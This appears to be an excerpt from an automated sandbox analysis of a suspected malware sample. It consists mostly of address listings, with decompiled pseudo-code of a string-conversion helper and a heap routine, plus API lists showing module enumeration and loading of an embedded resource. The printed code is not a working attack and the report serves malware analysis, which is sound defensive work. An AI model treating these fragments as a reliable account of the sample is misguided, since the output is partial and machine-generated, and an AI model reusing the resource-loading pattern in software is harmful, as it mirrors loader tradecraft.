                                                                                                                                                                                                        0x00402010
                                                                                                                                                                                                        0x00402015
                                                                                                                                                                                                        0x0040201a
                                                                                                                                                                                                        0x0040201f
                                                                                                                                                                                                        0x00402024
                                                                                                                                                                                                        0x00402029
                                                                                                                                                                                                        0x0040202e
                                                                                                                                                                                                        0x00402033
                                                                                                                                                                                                        0x00402038
                                                                                                                                                                                                        0x0040203d
                                                                                                                                                                                                        0x00402042
                                                                                                                                                                                                        0x00402047
                                                                                                                                                                                                        0x0040204c
                                                                                                                                                                                                        0x00402051
                                                                                                                                                                                                        0x00402056
                                                                                                                                                                                                        0x0040205b
                                                                                                                                                                                                        0x00402060
                                                                                                                                                                                                        0x00402065
                                                                                                                                                                                                        0x0040206a
                                                                                                                                                                                                        0x0040206f
                                                                                                                                                                                                        0x00402074
                                                                                                                                                                                                        0x00402079
                                                                                                                                                                                                        0x0040207e
                                                                                                                                                                                                        0x00402083
                                                                                                                                                                                                        0x00402088
                                                                                                                                                                                                        0x0040208d
                                                                                                                                                                                                        0x00402092
                                                                                                                                                                                                        0x00402097
                                                                                                                                                                                                        0x0040209c
                                                                                                                                                                                                        0x004020a1
                                                                                                                                                                                                        0x004020a5
                                                                                                                                                                                                        0x004020aa
                                                                                                                                                                                                        0x004020ae
                                                                                                                                                                                                        0x004020b4
                                                                                                                                                                                                        0x004020b6
                                                                                                                                                                                                        0x004020bb
                                                                                                                                                                                                        0x004020c0
                                                                                                                                                                                                        0x004020c5
                                                                                                                                                                                                        0x004020ca
                                                                                                                                                                                                        0x004020cf
                                                                                                                                                                                                        0x004020d4
                                                                                                                                                                                                        0x004020e1
                                                                                                                                                                                                        0x004020e6
                                                                                                                                                                                                        0x004020eb
                                                                                                                                                                                                        0x004020f0
                                                                                                                                                                                                        0x004020f5
                                                                                                                                                                                                        0x004020fa
                                                                                                                                                                                                        0x004020ff
                                                                                                                                                                                                        0x00402104
                                                                                                                                                                                                        0x00402109
                                                                                                                                                                                                        0x0040210e
                                                                                                                                                                                                        0x00402113
                                                                                                                                                                                                        0x00402118
                                                                                                                                                                                                        0x0040211d
                                                                                                                                                                                                        0x00402122
                                                                                                                                                                                                        0x00402127
                                                                                                                                                                                                        0x0040212c
                                                                                                                                                                                                        0x00402131
                                                                                                                                                                                                        0x00402136
                                                                                                                                                                                                        0x0040213b
                                                                                                                                                                                                        0x00402140
                                                                                                                                                                                                        0x00402145
                                                                                                                                                                                                        0x0040214a
                                                                                                                                                                                                        0x0040214f
                                                                                                                                                                                                        0x00402154
                                                                                                                                                                                                        0x00402159
                                                                                                                                                                                                        0x0040215e
                                                                                                                                                                                                        0x00402163
                                                                                                                                                                                                        0x00402167
                                                                                                                                                                                                        0x0040216c
                                                                                                                                                                                                        0x00402171
                                                                                                                                                                                                        0x00402177
                                                                                                                                                                                                        0x00402179
                                                                                                                                                                                                        0x0040217c
                                                                                                                                                                                                        0x0040217e
                                                                                                                                                                                                        0x00402183
                                                                                                                                                                                                        0x00402188
                                                                                                                                                                                                        0x0040218f
                                                                                                                                                                                                        0x00402196
                                                                                                                                                                                                        0x0040219a
                                                                                                                                                                                                        0x0040219e
                                                                                                                                                                                                        0x004021a2
                                                                                                                                                                                                        0x004021a4
                                                                                                                                                                                                        0x004021bc
                                                                                                                                                                                                        0x004021be
                                                                                                                                                                                                        0x004021c0
                                                                                                                                                                                                        0x004021c6
                                                                                                                                                                                                        0x004021ca
                                                                                                                                                                                                        0x004021e5
                                                                                                                                                                                                        0x004021ec
                                                                                                                                                                                                        0x004021f1
                                                                                                                                                                                                        0x00402213
                                                                                                                                                                                                        0x00402215
                                                                                                                                                                                                        0x00402217
                                                                                                                                                                                                        0x0040221d
                                                                                                                                                                                                        0x00402239
                                                                                                                                                                                                        0x0040223b
                                                                                                                                                                                                        0x0040223d
                                                                                                                                                                                                        0x00402243
                                                                                                                                                                                                        0x0040224d
                                                                                                                                                                                                        0x0040224f
                                                                                                                                                                                                        0x00402251
                                                                                                                                                                                                        0x00402260
                                                                                                                                                                                                        0x00402264
                                                                                                                                                                                                        0x00402269
                                                                                                                                                                                                        0x00402277
                                                                                                                                                                                                        0x0040227b
                                                                                                                                                                                                        0x00402286
                                                                                                                                                                                                        0x00402293
                                                                                                                                                                                                        0x004022af
                                                                                                                                                                                                        0x004022b1
                                                                                                                                                                                                        0x004022b5
                                                                                                                                                                                                        0x004022b7
                                                                                                                                                                                                        0x004022be
                                                                                                                                                                                                        0x004022be
                                                                                                                                                                                                        0x004022d7
                                                                                                                                                                                                        0x004022e8
                                                                                                                                                                                                        0x004022ef
                                                                                                                                                                                                        0x004022f6
                                                                                                                                                                                                        0x00402300
                                                                                                                                                                                                        0x00402304
                                                                                                                                                                                                        0x00402308
                                                                                                                                                                                                        0x00402315
                                                                                                                                                                                                        0x0040231a
                                                                                                                                                                                                        0x0040231e
                                                                                                                                                                                                        0x00402324
                                                                                                                                                                                                        0x00402328
                                                                                                                                                                                                        0x0040232a
                                                                                                                                                                                                        0x00402331
                                                                                                                                                                                                        0x00402331
                                                                                                                                                                                                        0x0040234e
                                                                                                                                                                                                        0x00402350
                                                                                                                                                                                                        0x00402352
                                                                                                                                                                                                        0x00402355
                                                                                                                                                                                                        0x00402355
                                                                                                                                                                                                        0x0040235b
                                                                                                                                                                                                        0x0040235f
                                                                                                                                                                                                        0x00402361
                                                                                                                                                                                                        0x00402368
                                                                                                                                                                                                        0x00402368
                                                                                                                                                                                                        0x0040236d
                                                                                                                                                                                                        0x00402371
                                                                                                                                                                                                        0x00402373
                                                                                                                                                                                                        0x00402375
                                                                                                                                                                                                        0x0040237b
                                                                                                                                                                                                        0x0040237b
                                                                                                                                                                                                        0x00402377
                                                                                                                                                                                                        0x00402377
                                                                                                                                                                                                        0x00402377
                                                                                                                                                                                                        0x00402390
                                                                                                                                                                                                        0x00402396
                                                                                                                                                                                                        0x0040239c
                                                                                                                                                                                                        0x004023a0
                                                                                                                                                                                                        0x004023a2
                                                                                                                                                                                                        0x004023a9
                                                                                                                                                                                                        0x004023a9
                                                                                                                                                                                                        0x004023ae
                                                                                                                                                                                                        0x004023b2
                                                                                                                                                                                                        0x004023b4
                                                                                                                                                                                                        0x004023ba
                                                                                                                                                                                                        0x004023ba
                                                                                                                                                                                                        0x004023b6
                                                                                                                                                                                                        0x004023b6
                                                                                                                                                                                                        0x004023b6
                                                                                                                                                                                                        0x004023ce
                                                                                                                                                                                                        0x004023d1
                                                                                                                                                                                                        0x004023d3
                                                                                                                                                                                                        0x004023dd
                                                                                                                                                                                                        0x004023ec
                                                                                                                                                                                                        0x004023ef
                                                                                                                                                                                                        0x004023fe
                                                                                                                                                                                                        0x00402401
                                                                                                                                                                                                        0x00402403
                                                                                                                                                                                                        0x00402411
                                                                                                                                                                                                        0x00402417
                                                                                                                                                                                                        0x00402424
                                                                                                                                                                                                        0x00402426
                                                                                                                                                                                                        0x0040242a
                                                                                                                                                                                                        0x0040242c
                                                                                                                                                                                                        0x00402434
                                                                                                                                                                                                        0x00402434
                                                                                                                                                                                                        0x0040243a
                                                                                                                                                                                                        0x0040243f
                                                                                                                                                                                                        0x00402443
                                                                                                                                                                                                        0x00402445
                                                                                                                                                                                                        0x0040244d
                                                                                                                                                                                                        0x0040244d
                                                                                                                                                                                                        0x00402445
                                                                                                                                                                                                        0x00402251
                                                                                                                                                                                                        0x0040223d
                                                                                                                                                                                                        0x0040244f
                                                                                                                                                                                                        0x0040245d
                                                                                                                                                                                                        0x0040245f
                                                                                                                                                                                                        0x00402461
                                                                                                                                                                                                        0x00402462
                                                                                                                                                                                                        0x00402467
                                                                                                                                                                                                        0x00402467
                                                                                                                                                                                                        0x0040245f
                                                                                                                                                                                                        0x004021ca
                                                                                                                                                                                                        0x0040246a
                                                                                                                                                                                                        0x0040246e
                                                                                                                                                                                                        0x00402470
                                                                                                                                                                                                        0x00402478
                                                                                                                                                                                                        0x00402478
                                                                                                                                                                                                        0x0040247a
                                                                                                                                                                                                        0x0040247e
                                                                                                                                                                                                        0x00402480
                                                                                                                                                                                                        0x00402488
                                                                                                                                                                                                        0x00402488
                                                                                                                                                                                                        0x00402480
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c55
                                                                                                                                                                                                        0x00401c62
                                                                                                                                                                                                        0x00401c67
                                                                                                                                                                                                        0x00401c6a
                                                                                                                                                                                                        0x00401c6c
                                                                                                                                                                                                        0x00401c73
                                                                                                                                                                                                        0x00401c73
                                                                                                                                                                                                        0x00401c77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c7b
                                                                                                                                                                                                        0x00401c8f
                                                                                                                                                                                                        0x00401c8f
                                                                                                                                                                                                        0x00401c7d
                                                                                                                                                                                                        0x00401c7d
                                                                                                                                                                                                        0x00401c83
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c85
                                                                                                                                                                                                        0x00401c85
                                                                                                                                                                                                        0x00401c88
                                                                                                                                                                                                        0x00401c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c8d
                                                                                                                                                                                                        0x00401c83
                                                                                                                                                                                                        0x00401c98
                                                                                                                                                                                                        0x00401c9a
                                                                                                                                                                                                        0x00401cbd
                                                                                                                                                                                                        0x00401cc2
                                                                                                                                                                                                        0x00401cc5
                                                                                                                                                                                                        0x00401cc7
                                                                                                                                                                                                        0x00401cd0
                                                                                                                                                                                                        0x00401cd0
                                                                                                                                                                                                        0x00401cd2
                                                                                                                                                                                                        0x00401cd4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cd6
                                                                                                                                                                                                        0x00401cd8
                                                                                                                                                                                                        0x00401cec
                                                                                                                                                                                                        0x00401cec
                                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                                        0x00401cda
                                                                                                                                                                                                        0x00401cdd
                                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401ce2
                                                                                                                                                                                                        0x00401ce2
                                                                                                                                                                                                        0x00401ce5
                                                                                                                                                                                                        0x00401ce8
                                                                                                                                                                                                        0x00401cea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cea
                                                                                                                                                                                                        0x00401ce0
                                                                                                                                                                                                        0x00401cf5
                                                                                                                                                                                                        0x00401cf5
                                                                                                                                                                                                        0x00401cf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cf9
                                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                                        0x00401d07
                                                                                                                                                                                                        0x00401d09
                                                                                                                                                                                                        0x00401d10
                                                                                                                                                                                                        0x00401d1d
                                                                                                                                                                                                        0x00401d22
                                                                                                                                                                                                        0x00401d25
                                                                                                                                                                                                        0x00401d27
                                                                                                                                                                                                        0x00401d30
                                                                                                                                                                                                        0x00401d30
                                                                                                                                                                                                        0x00401d32
                                                                                                                                                                                                        0x00401d34
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d36
                                                                                                                                                                                                        0x00401d38
                                                                                                                                                                                                        0x00401d4c
                                                                                                                                                                                                        0x00401d4c
                                                                                                                                                                                                        0x00401d3a
                                                                                                                                                                                                        0x00401d3a
                                                                                                                                                                                                        0x00401d3d
                                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d42
                                                                                                                                                                                                        0x00401d42
                                                                                                                                                                                                        0x00401d45
                                                                                                                                                                                                        0x00401d48
                                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d4a
                                                                                                                                                                                                        0x00401d40
                                                                                                                                                                                                        0x00401d55
                                                                                                                                                                                                        0x00401d55
                                                                                                                                                                                                        0x00401d57
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d5d
                                                                                                                                                                                                        0x00401d6a
                                                                                                                                                                                                        0x00401d6f
                                                                                                                                                                                                        0x00401d72
                                                                                                                                                                                                        0x00401d74
                                                                                                                                                                                                        0x00401d80
                                                                                                                                                                                                        0x00401d80
                                                                                                                                                                                                        0x00401d82
                                                                                                                                                                                                        0x00401d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d86
                                                                                                                                                                                                        0x00401d88
                                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                                        0x00401d9c
                                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                                        0x00401d8a
                                                                                                                                                                                                        0x00401d8d
                                                                                                                                                                                                        0x00401d90
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d92
                                                                                                                                                                                                        0x00401d92
                                                                                                                                                                                                        0x00401d95
                                                                                                                                                                                                        0x00401d98
                                                                                                                                                                                                        0x00401d9a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d9a
                                                                                                                                                                                                        0x00401d90
                                                                                                                                                                                                        0x00401da5
                                                                                                                                                                                                        0x00401da5
                                                                                                                                                                                                        0x00401da7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401da7
                                                                                                                                                                                                        0x00401da0
                                                                                                                                                                                                        0x00401da2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401da2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d57
                                                                                                                                                                                                        0x00401d50
                                                                                                                                                                                                        0x00401d52
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401dad
                                                                                                                                                                                                        0x00401db6
                                                                                                                                                                                                        0x00401dbb
                                                                                                                                                                                                        0x00401dbb
                                                                                                                                                                                                        0x00401d10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401d09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401cf7
                                                                                                                                                                                                        0x00401cf0
                                                                                                                                                                                                        0x00401cf2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c9c
                                                                                                                                                                                                        0x00401c9c
                                                                                                                                                                                                        0x00401c9d
                                                                                                                                                                                                        0x00401caf
                                                                                                                                                                                                        0x00401caf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c9a
                                                                                                                                                                                                        0x00401c93
                                                                                                                                                                                                        0x00401c95
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00401c95
                                                                                                                                                                                                        0x00401c4f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                        • API String ID: 2366190142-2962942730
                                                                                                                                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 152 4018f0-4018fa 153 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 152->153 154 4018fc-401900 152->154 157 401940-401949 GetLastError 153->157 158 401996-40199a 153->158 159 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 157->159 160 40198d-40198f 157->160 159->160 160->158 162 401991 call 401030 160->162 162->158
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				char* _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __edx;
                                                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                                                                                        						_t12 = GetLastError();
                                                                                                                                                                                                        						if(_t12 == 0x7a) {
                                                                                                                                                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                        							asm("sbb esi, esi");
                                                                                                                                                                                                        							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t30 != 0) {
                                                                                                                                                                                                        							_t12 = E00401030();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *__ecx = _t35;
                                                                                                                                                                                                        					return __eax;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x004018f0
                                                                                                                                                                                                        0x004018f2
                                                                                                                                                                                                        0x004018f6
                                                                                                                                                                                                        0x004018fa
                                                                                                                                                                                                        0x00401917
                                                                                                                                                                                                        0x0040191a
                                                                                                                                                                                                        0x0040192f
                                                                                                                                                                                                        0x00401939
                                                                                                                                                                                                        0x0040193b
                                                                                                                                                                                                        0x0040193e
                                                                                                                                                                                                        0x00401940
                                                                                                                                                                                                        0x00401949
                                                                                                                                                                                                        0x0040195e
                                                                                                                                                                                                        0x0040196b
                                                                                                                                                                                                        0x00401980
                                                                                                                                                                                                        0x0040198a
                                                                                                                                                                                                        0x0040198c
                                                                                                                                                                                                        0x0040198c
                                                                                                                                                                                                        0x0040198f
                                                                                                                                                                                                        0x00401991
                                                                                                                                                                                                        0x00401991
                                                                                                                                                                                                        0x0040198f
                                                                                                                                                                                                        0x0040199a
                                                                                                                                                                                                        0x004018fc
                                                                                                                                                                                                        0x004018fc
                                                                                                                                                                                                        0x00401900
                                                                                                                                                                                                        0x00401900

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3322701435-0
                                                                                                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 165 40af66-40af6e 166 40af7d-40af88 call 40b84d 165->166 169 40af70-40af7b call 40d2e3 166->169 170 40af8a-40af8b 166->170 169->166 173 40af8c-40af98 169->173 174 40afb3-40afca call 40af49 call 40cd39 173->174 175 40af9a-40afb2 call 40aefc call 40d2bd 173->175 175->174
                                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v4;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t40 = __edi;
                                                                                                                                                                                                        				_t28 = __ebx;
                                                                                                                                                                                                        				_t45 = _t51;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = E0040D2E3(_a4);
                                                                                                                                                                                                        					__eflags = _t15;
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                                                                                                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                                                                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                                                                                                                        							__eflags =  *0x423490;
                                                                                                                                                                                                        							E0040AEFC(0x423484);
                                                                                                                                                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E0040AF49( &_v16, 0x423484);
                                                                                                                                                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                                                                                                                                                        						asm("int3");
                                                                                                                                                                                                        						_t47 = _t45;
                                                                                                                                                                                                        						_push(_t47);
                                                                                                                                                                                                        						_push(0xc);
                                                                                                                                                                                                        						_push(0x420ff8);
                                                                                                                                                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                                                                                                                                                        						_t42 = _v4;
                                                                                                                                                                                                        						__eflags = _t42;
                                                                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                                                                        							__eflags =  *0x4250b0 - 3;
                                                                                                                                                                                                        							if( *0x4250b0 != 3) {
                                                                                                                                                                                                        								_push(_t42);
                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E0040D6E0(_t28, 4);
                                                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                        								_t24 = E0040D713(_t42);
                                                                                                                                                                                                        								_v40 = _t24;
                                                                                                                                                                                                        								__eflags = _t24;
                                                                                                                                                                                                        								if(_t24 != 0) {
                                                                                                                                                                                                        									_push(_t42);
                                                                                                                                                                                                        									_push(_t24);
                                                                                                                                                                                                        									E0040D743();
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_v16 = 0xfffffffe;
                                                                                                                                                                                                        								_t19 = E0040B70B();
                                                                                                                                                                                                        								__eflags = _v40;
                                                                                                                                                                                                        								if(_v40 == 0) {
                                                                                                                                                                                                        									_push(_v4);
                                                                                                                                                                                                        									L16:
                                                                                                                                                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                        										_t21 = E0040BFC1(__eflags);
                                                                                                                                                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						return E0040E21D(_t19);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        				goto L19;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x0040af66
                                                                                                                                                                                                        0x0040af66
                                                                                                                                                                                                        0x0040af69
                                                                                                                                                                                                        0x0040af7d
                                                                                                                                                                                                        0x0040af80
                                                                                                                                                                                                        0x0040af88
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040af73
                                                                                                                                                                                                        0x0040af79
                                                                                                                                                                                                        0x0040af7b
                                                                                                                                                                                                        0x0040af8c
                                                                                                                                                                                                        0x0040af98
                                                                                                                                                                                                        0x0040af9a
                                                                                                                                                                                                        0x0040af9a
                                                                                                                                                                                                        0x0040afa3
                                                                                                                                                                                                        0x0040afad
                                                                                                                                                                                                        0x0040afb2
                                                                                                                                                                                                        0x0040afb7
                                                                                                                                                                                                        0x0040afc5
                                                                                                                                                                                                        0x0040afca
                                                                                                                                                                                                        0x0040afd0
                                                                                                                                                                                                        0x0040aec2
